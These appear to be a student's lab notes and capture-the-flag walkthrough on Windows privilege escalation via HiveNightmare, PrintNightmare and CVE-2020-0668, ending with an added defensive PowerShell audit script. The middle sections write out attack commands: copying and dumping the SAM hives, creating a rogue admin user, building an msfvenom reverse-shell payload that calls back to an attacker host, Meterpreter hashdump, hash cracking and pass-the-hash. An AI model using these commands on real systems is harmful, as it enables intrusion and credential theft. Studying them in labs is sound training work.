# Intro

- In large enterprises, ensuring that all user desktops and servers are updated and patched is a great challenge
- SCCM (Microsoft System Center Configuration Manager) or WSUS (Windows Server Update Services) can help here
- Regardless, there have been many kernel exploits that affect the Windows operating system from Windows 2000/XP up to Windows 10/Server 2016/2019
- This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed info about Microsoft vulns

# Notable Vulns

- `MS08-067`
    - This was an RCE vuln in the "Server" service due to improper handling of RPC requests
    - This affected Windows Server 2000, 2003, and 2008 and Windows XP and Vista and allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges
- `MS17-010`
    - Also known as [EternalBlue](https://en.wikipedia.org/wiki/EternalBlue), this is an RCE vuln that was part of the FuzzBunch toolkit released in the [Shadow Brokers](https://en.wikipedia.org/wiki/The_Shadow_Brokers) leak
    - This exploit leverages a vuln in the SMB protocol: the SMBv1 protocol mishandles packets specially crafted by an attacker, leading to arbitrary code execution on the target host as the SYSTEM account
- `ALPC Task Scheduler 0-Day`
    - The ALPC endpoint method used by the Windows Task Scheduler service could be used to write arbitrary DACLs to `.job` files located in the `C:\Windows\tasks` directory
    - An attacker could leverage this to create a hard link to a file that the attacker controls
    - The exploit for this flaw used the [SchRpcSetSecurity](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/a8172c11-a24a-4ad9-abd0-82bcf29d794d?redirectedfrom=MSDN) API function to call a print job using the XPS printer and hijack the DLL as NT AUTHORITY\SYSTEM via the Spooler service
- `CVE-2021-36934 HiveNightmare`
    - Windows 10 flaw that results in ANY user having rights to read the Windows registry and access sensitive info
    - Researchers quickly
developed a PoC exploit to allow reading of the SAM, SYSTEM, and SECURITY registry hives and create copies of them to process offline later and extract password hashes (including local admin) using a tool such as SecretsDump.py
- `CVE-2021-1675/CVE-2021-34527 PrintNightmare`
    - This is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22), which is used to allow for remote printing and driver installation
    - This function is intended to give users with the Windows privilege `SeLoadDriverPrivilege` the ability to add drivers to a remote Print Spooler
    - The flaw allowed any authenticated user to add a print driver to a Windows system without having the privilege mentioned above, allowing an attacker full RCE as SYSTEM
    - The flaw affects every supported version of Windows, and since the Print Spooler runs by default on Domain Controllers, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface

---

# Example Kernel Exploit - HiveNightmare

- Successful exploitation requires a readable SAM file and the presence of one or more shadow copies
- Most Windows 10 systems will have `System Protection` enabled by default, which creates periodic backups, including the shadow copy necessary to leverage this flaw
- First, check perms on the SAM file using `icacls`

```cmd
icacls c:\Windows\System32\config\SAM
```

- This [PoC](https://github.com/GossiTheDog/HiveNightmare) can be used to perform the attack on the Windows target, creating copies of the aforementioned registry hives

```powershell
.\HiveNightmare.exe
```

- Then, move the exported SAM, SYSTEM, and SECURITY hives to Kali, where we will extract password hashes

```bash
impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local
```

---

# Example Kernel Exploit - PrintNightmare

- First, check to see if the Spooler service is running
- If not, we will
receive a "path does not exist" error

```powershell
ls \\localhost\pipe\spoolss
```

- Next, [bypass](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host

```powershell
Set-ExecutionPolicy Bypass -Scope Process
```

- Now, import [this](https://github.com/calebstewart/CVE-2021-1675) PowerShell script and use it to add a new local admin user
- This script can be used for quick local privesc
- By default, this script adds a new local admin user
- Alternatively, we can also supply a custom DLL to obtain a revshell

```powershell-session
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
```

- Then, confirm the new admin user

```powershell
net user hacker
```

---

# Enumerate Missing Patches

- Examine the installed updates on the target with one of the three commands below

```powershell
systeminfo
wmic qfe list brief
Get-Hotfix
```

- Search for each KB (Microsoft Knowledge Base ID number) in the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000808) to get a better idea of what fixes have been installed and how far behind the system may be on security updates

## CVE-2020-0668 Example

- In this example, we will exploit [Microsoft CVE-2020-0668: Windows Kernel Elevation of Privilege Vulnerability](https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/), which exploits an arbitrary file move vulnerability leveraging Windows Service Tracing
- Service Tracing allows users to troubleshoot issues with running services and modules by generating debug information
- Its parameters are configurable using the Windows registry.
- Setting a custom MaxFileSize value that is smaller than the size of the file prompts the file to be renamed with a `.OLD` extension when the service is triggered
- This move operation is performed by `NT AUTHORITY\SYSTEM`, and can be abused to move a file of our choosing with the help of mount points and symbolic links
- Verify the current user's privs

```cmd
whoami /priv
```

- Next, download and build [this](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) exploit for CVE-2020-0668
- After building the exploit we should see the following files

```txt
CVE-2020-0668.exe
CVE-2020-0668.exe.config
CVE-2020-0668.pdb
NtApiDotNet.dll
NtApiDotNet.xml
```

- At this point, we can use the exploit to create a file of our choosing in a protected folder such as `C:\Windows\System32`
- We aren't able to overwrite any protected Windows files
- This privileged file write needs to be chained with another vulnerability, such as [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [DiagHub](https://github.com/xct/diaghub), to load the DLL and escalate our privileges
- We can also look for any third-party software which can be leveraged, such as the Mozilla Maintenance Service
- This service runs in the context of SYSTEM and is startable by unprivileged users
- Runpath = `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe`
- Check perms on `maintenanceservice.exe` with `icacls`
- If `BUILTIN\USERS` have `(I)RX` privs, standard users only have read and execute perms on this binary

```cmd
icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

- Generate a malicious `maintenanceservice.exe` binary that can be used to obtain a Meterpreter revshell

```shell-session
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe -o maintenanceservice.exe
```

- Host the malicious binary from Kali and download two copies onto the target
- NOTE: We need two copies because running the exploit corrupts
the malicious version of `maintenanceservice.exe` that is moved to `c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe`

```powershell
wget http://10.10.15.244:8080/maintenanceservice.exe -O maintenanceservice.exe
wget http://10.10.15.244:8080/maintenanceservice.exe -O maintenanceservice2.exe
```

- Run the exploit

```cmd
C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

- Now, check the perms on the new file

```cmd
icacls "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

- Overwrite the `maintenanceservice.exe` binary in `c:\Program Files (x86)\Mozilla Maintenance Service` with a good working copy of our malicious binary created earlier before proceeding to start the service

```cmd
copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
```

- Next we will set up the listener in `msf`
- Here, we will create a resource script that will be used to preload our settings

```bash
cat handler.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <our_ip>
set LPORT 8443
exploit

sudo msfconsole -r handler.rc
```

- Now we can start the service

```cmd
net start MozillaMaintenance
```

- We will get an error when starting the service but will still receive a callback once the Meterpreter binary executes

```bash
[*] Started HTTPS reverse handler on https://10.10.14.3:8443
[*] https://10.10.14.3:8443 handling request from 10.129.43.13; (UUID: syyuxztc) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (10.10.14.3:8443 -> 10.129.43.13:52047) at 2021-05-14 13:38:55 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINLPE-WS02
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 6
Meterpreter     : x64/windows
meterpreter > hashdump
Administrator:500:aad
```

---

# Exercise

## Initial Enum

- `ping` test ![[images/Pasted image 20260221171627.png]]
- `nmap` scan ![[images/Pasted image 20260221171636.png]]
- `rdp` into target with given creds
- Light internal enum on target
- No interesting privs or groups ![[images/Pasted image 20260221172034.png]]
- Check `\tools` ![[images/Pasted image 20260221172050.png]]
- Check `systeminfo` ![[images/Pasted image 20260221172117.png]]

---

## HiveNightmare

- Check perms on `SAM`
- `BUILTIN\USERS` have `(I)RX` perms ![[images/Pasted image 20260221172208.png]]
- Let's download `https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe` on Kali and move it to the target ![[images/Pasted image 20260221172715.png]] ![[images/Pasted image 20260221172728.png]]
- Run the exploit ![[images/Pasted image 20260221172836.png]]
- Move SAM, SYSTEM, SECURITY to Kali
- Start up an FTP server on Kali ![[images/Pasted image 20260221173632.png]]
- Upload to the FTP server from the target ![[images/Pasted image 20260221173856.png]]
- SAM is now on Kali ![[images/Pasted image 20260221173927.png]] ![[images/Pasted image 20260221173918.png]]
- Repeat for SYSTEM and SECURITY ![[images/Pasted image 20260221174205.png]] ![[images/Pasted image 20260221174215.png]]
- Now that we have SAM, SYSTEM, and SECURITY on Kali, let's extract password hashes with `secretsdump.py` ![[images/Pasted image 20260221174324.png]]
- Crack the `nthash` portion of the Administrator password with `hashcat` as below
- Exhausted list

```bash
hashcat -m 1000 "hash" /opt/rockyou.txt
```

- Let's try to PtH with `nxc`

```bash
nxc smb ip -u user -H hash
```

- PWNED ![[images/Pasted image 20260221175021.png]]
- Now we can find and `type` the flag from here

```bash
nxc smb ip -u user -H hash -X "dir \users\administrator\desktop"
nxc smb ip -u user -H hash -X "type \users\administrator\desktop\flag.txt"
```

---

## PrintNightmare

- Check for the Spooler service ![[images/Pasted image 20260221175358.png]]
- Bypass execution policy ![[images/Pasted image 20260221175426.png]]
- Confirm that `\tools` has `CVE-2021-1675.ps1` ![[images/Pasted image 20260221175507.png]]
- Import and run `CVE-2021-1675.ps1` ![[images/Pasted image 20260221175709.png]]
- Confirm new user `jake` > booyah! ![[images/Pasted image 20260221175741.png]]
- Sign out of the current session and reconnect with `rdp` as the new user ![[images/Pasted image 20260221175910.png]]
- Now check privs and head to the flag ![[images/Pasted image 20260221180120.png]] ![[images/Pasted image 20260221180157.png]]

---

## CVE-2020-0668

- Enumerate updates with `wmic`
- No updates since 2020 ![[images/Pasted image 20260221180358.png]]
- Review privs and available tools ![[images/Pasted image 20260221180518.png]]
- Check perms on `maintenanceservice.exe`
- `BUILTIN\Users:(I)(RX)` ![[images/Pasted image 20260221180629.png]]
- Generate Meterpreter payload on Kali ![[images/Pasted image 20260221180722.png]]
- Host the payload and `wget` it on the target ![[images/Pasted image 20260221180902.png]] ![[images/Pasted image 20260221180924.png]]
- Run the exploit `C:\Tools\CVE-2020-0668\CVE-2020-0668.exe` ![[images/Pasted image 20260221181033.png]]
- Check perms on the new file
- `htb-student` has full control over the binary now ![[images/Pasted image 20260221181117.png]]
- Replace the file with the second copy of the payload
- Downgrade to `cmd.exe` ![[images/Pasted image 20260221181336.png]]
- Create `msf` resource file ![[images/Pasted image 20260221181424.png]]
- Launch `msf` with the above resource file ![[images/Pasted image 20260221181904.png]]
- Start the `MozillaMaintenance` service and hope for a revshell ![[images/Pasted image 20260221182009.png]]
- We have a revshell! ![[images/Pasted image 20260221182002.png]]
- We have options now: drop into a shell and navigate to the flag; PtH with `nxc`; or crack the hash with `hashcat` and log in as `administrator`
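As an added example that is not part of the original notes or of any of the linked projects, the PowerShell script below turns the checks this page uses on the way in into a defender's audit of the same preconditions: the missing-KB comparison from Enumerate Missing Patches, the readable SAM plus existing shadow copy that the HiveNightmare example depends on, and the running Spooler that gives PrintNightmare its attack surface. The function names, the `$RequiredKBs` placeholder list and the output fields are my own; the `icacls ... /inheritance:e` plus shadow-copy deletion is Microsoft's published workaround for CVE-2021-36934, and disabling the Spooler where it is not needed is the standard PrintNightmare mitigation. Run it in an elevated session; it only reports and changes nothing.

```powershell
# Added example (not from the original notes): audit a host for the
# preconditions of the flaws discussed on this page. Run in an elevated
# PowerShell session. Nothing here modifies the system; remediation is
# reported as text, not executed.

# Placeholder list: fill it from the Microsoft Update Catalog for this OS build
$RequiredKBs = @('KB5000808')

function Test-MissingPatches {
    param([string[]]$Required)
    # Same data the page pulls with Get-HotFix / wmic qfe, compared to a baseline
    $installed = @(Get-HotFix)
    $missing   = @($Required | Where-Object { $_ -notin $installed.HotFixID })
    $latest    = ($installed | Where-Object InstalledOn |
                  Sort-Object InstalledOn | Select-Object -Last 1).InstalledOn
    if ($missing) { $detail = "Not installed: $($missing -join ', ')" }
    else          { $detail = 'All required KBs present' }
    [pscustomobject]@{
        Check       = 'Missing patches'
        AtRisk      = ($missing.Count -gt 0)
        Detail      = $detail
        LastUpdate  = $latest
        Remediation = 'Deploy the missing KBs through WSUS/SCCM'
    }
}

function Test-HiveNightmare {
    # CVE-2021-36934 needs both: BUILTIN\Users can read SAM, and a shadow copy exists
    $samAcl    = Get-Acl -LiteralPath "$env:windir\System32\config\SAM"
    $readRight = [System.Security.AccessControl.FileSystemRights]::ReadData
    $usersCanRead = [bool]($samAcl.Access | Where-Object {
        $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        (($_.FileSystemRights -band $readRight) -ne 0)
    })
    $shadowCount = @(Get-CimInstance -ClassName Win32_ShadowCopy).Count
    [pscustomobject]@{
        Check       = 'CVE-2021-36934 HiveNightmare'
        AtRisk      = ($usersCanRead -and $shadowCount -gt 0)
        Detail      = "BUILTIN\Users can read SAM: $usersCanRead; shadow copies: $shadowCount"
        LastUpdate  = $null
        Remediation = 'Patch; until then restore the ACL (icacls %windir%\system32\config\*.* /inheritance:e) and delete existing shadow copies'
    }
}

function Test-PrintNightmare {
    # CVE-2021-1675/34527: the exposed surface is a running Print Spooler;
    # domain controllers and non-printing servers should not run it at all
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $running = [bool]($spooler -and $spooler.Status -eq 'Running')
    $isDC    = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole -ge 4
    [pscustomobject]@{
        Check       = 'CVE-2021-1675/34527 PrintNightmare'
        AtRisk      = $running
        Detail      = "Spooler running: $running; domain controller: $isDC"
        LastUpdate  = $null
        Remediation = 'Patch; where printing is not needed: Stop-Service Spooler; Set-Service Spooler -StartupType Disabled'
    }
}

# Collect the three results as objects so they can be gathered from many hosts and filtered
@(
    Test-MissingPatches -Required $RequiredKBs
    Test-HiveNightmare
    Test-PrintNightmare
) | Format-List
```

Each function returns an object with an `AtRisk` flag rather than printing text, so the output of many hosts can be collected and filtered on that one field. The HiveNightmare check only flags a host when both conditions hold, matching the page's statement that a readable SAM and a shadow copy are each necessary; for PrintNightmare, the patch result from the first check decides whether a running Spooler is merely attack surface or an unpatched exposure, which is why the two checks are reported together.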